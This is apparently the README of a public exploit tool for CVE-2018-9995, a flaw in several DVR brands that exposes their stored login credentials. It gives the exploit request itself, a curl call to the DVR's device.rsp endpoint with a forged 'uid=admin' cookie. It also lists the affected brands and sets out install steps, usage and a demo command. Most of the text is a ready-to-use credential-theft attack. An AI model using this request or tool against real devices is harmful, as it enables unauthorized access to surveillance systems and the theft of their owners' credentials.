Script to obtain the credentials of the DVRs (CVE-2018-9995)

This script allows you to obtain the credentials of certain brands of DVRs, using the vulnerability CVE-2018-9995

Show credentials of DVRs

[*] Exploit Title:       "Gets DVR Credentials" 
[*] CVE:                 CVE-2018-9995
[*] CVSS Base Score v3:  7.3 / 10
[*] CVSS Vector String:  CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N  
[*] Date:                09/04/2018
[*] Exploit Author:      Fernandez Ezequiel ( twitter:@capitan_alfa )

Exploit

user @ computer: $ $> curl "http: //: /device.rsp? opt = user & cmd = list" -H "Cookie: uid = admin"

Tested on the following DVRs (Brands)

Novo
CeNova
QSee
Pulnix
XVR 5 in 1 (title: "XVR Login")
Securus,  - Security. Never Compromise !! - 
Night OWL
DVR Login
HVR Login
MDVR Login

Internet searches

Installation

user @ computer: $ git clone https://github.com/ezelf/CVE-2018-9995_dvr_credentials.git

user @ computer: $ cd CVE-2018-9995_dvr_credentials 
pip install -r requirements.txt

user @ computer: $ pip install -r requirements.txt

Help

user @ computer: $ usage: getDVR_Credentials.py [-h] [-v] --host HOST [--port PORT] 

[+] Obtaining Exposed credentials 

optional arguments: 
-h, --help show this help message and exit 
- v, --version show program's version number and exit 
--host HOST Host 
--port PORT Port 

[+] Demo: python getDVR_Credentials.py --host 192.168.1.101 -p 81

Pocs (Output) :

Download Click Here